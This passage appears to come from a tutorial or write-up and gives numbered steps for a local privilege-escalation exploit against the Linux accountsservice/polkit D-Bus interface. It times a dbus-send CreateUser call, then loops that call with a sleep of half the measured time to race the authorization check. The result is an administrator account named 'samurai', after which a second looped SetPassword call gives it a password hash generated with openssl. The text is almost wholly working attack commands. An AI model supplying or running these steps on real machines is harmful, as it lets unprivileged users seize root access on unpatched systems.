

1. Measura Execution Time: Note the 'real' time and calculate half of it.

```
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --
print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser
string:samurai string:"Samurai" int32:1
```

2. Create a User with Sudo Privileges: Replace X.XXX with half of the 'real' time above because we want the process to be interrupted in the middle the command will run as a loop of 10000 times You may need to run this step several times

```
for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --
type=method_call --print-reply /org/freedesktop/Accounts
org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep
X.XXXs; done
```

3. Check User creation `id samurai` It should show samurai user exists and show his permissions. Run the step 2 again if not.

4. Generate Password Hash: in this case, password would be `iamsamurai` Note the hash generated.

```
openssl passwd -5 iamsamurai
```

5. Set Password for New User: Replace X.XXX with the sleep duration and Password Hash with the hash from step 4. Replace UUUU with the user ID of 'samurai'

```
for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --
type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU
org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye &
sleep X.XXXs; done
```